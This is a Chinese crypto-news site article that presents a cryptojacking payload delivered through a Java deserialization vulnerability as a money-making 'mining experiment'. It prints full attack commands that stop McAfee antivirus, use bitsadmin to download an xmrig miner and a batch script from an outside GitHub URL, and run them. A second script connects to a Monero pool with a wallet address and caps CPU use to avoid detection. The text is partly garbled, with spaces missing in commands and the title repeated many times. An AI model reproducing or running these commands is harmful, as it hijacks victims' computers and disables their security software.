西柚财经 首页挖矿 查看内容
  • QQ空间
  • 回复

其实,你也可以用java来挖矿

2018-08-13 23:14

现在很多人都热衷于挖矿。俨然,挖矿成为了人们一种新兴的赚取资本的手段了。可是当你开始挖的时候就会发现,身边的那些电脑大神使用自己的电脑技术已经赚得盆满钵满了。这让我们十分嫉妒,今天我就分享下如何用java反序列化漏洞在Windows上的挖矿实验。

攻击代码如下:

cmd/cnet stop"McAfee McShield;net stop mcafeeframework;bitsadmin.exe /transfer"xmrig.bat" /download /priority foregroundhttp://raw.githubusercontent.com/sirikun/starships/master/xmrig.bat"%cd%\\xmrig.bat";bitsadmin.exe /transfer "xmrig.exe"/download /priority foregroundhttp://raw.githubusercontent.com/sirikun/starships/master/xmrig.exe"%cd%\\xmrig.exe;dir xmrig*;xmrig.bat;tasklist;

实际的Payload分析

关闭McAfee反病毒软件(我不明白社区中的这种技术为啥只关掉McAfee…):

netstop "McAfee McShield;netstop mcafeeframework;

使用bitsadmin从GitHub下载加密货币挖矿程序和一个batch脚本文件:

bitsadmin.exe/transfer "xmrig.bat" /download /priority foregroundhttp://raw.githubusercontent.com/sirikun/starships/master/xmrig.bat"%cd%\\xmrig.bat";bitsadmin.exe/transfer "xmrig.exe" /download /priority foreground http://raw.githubusercontent.com/sirikun/starships/master/xmrig.exe"%cd%\\xmrig.exe;dirxmrig*;xmrig.bat;tasklist;

Batch脚本文件代码如下:

taskkill/im /f xmrig.exe /tnetstop "McAfee McShield"netstop mcafeeframeworkxmrig.exe-o http://monerohash.com:3333 -u 42jF56tc85UTZwhMQc6rHbMHTxHqK74qS2zqLyRZxLbwegsy7FJ9w4T5B69Ay5qeMEMuvVDwHNeopAxrEZkkHrMb5phovJ6-p x --background --max-cpu-usage=50 --donate-level=1

首先,上述代码会终止其他xmrig进程(可能是为了防止资源竞争)。接下来,它会关闭McAfee。然后便会开启挖矿程序,并跟http://monerohash.com矿池(端口3333)进行连接。它只会占用大约50%的CPU资源,估计是为了避免被检测到吧。

可是很多小白说我并不会使用java啊,那要怎么办?今天我就在这里分享我学习java时所用的入门资料,这份资料真的很全面,帮助我快速入门。废话少说,让我们来看看吧

其实,你也可以用java来挖矿


其实,你也可以用java来挖矿


其实,你也可以用java来挖矿


其实,你也可以用java来挖矿


想不想挖更多的矿呢?想象一下,每当自己使用学会电脑技术去得到更多的回报是不是很心动呢?那么就快点关注并私聊我吧,我会分享给你最全面的java入门资料的


其实,你也可以用java来挖矿


最后希望各位矿工学习了以后可以挖到更多的框

其实,你也可以用java来挖矿


其实,你也可以用java来挖矿

文章点评
相关新闻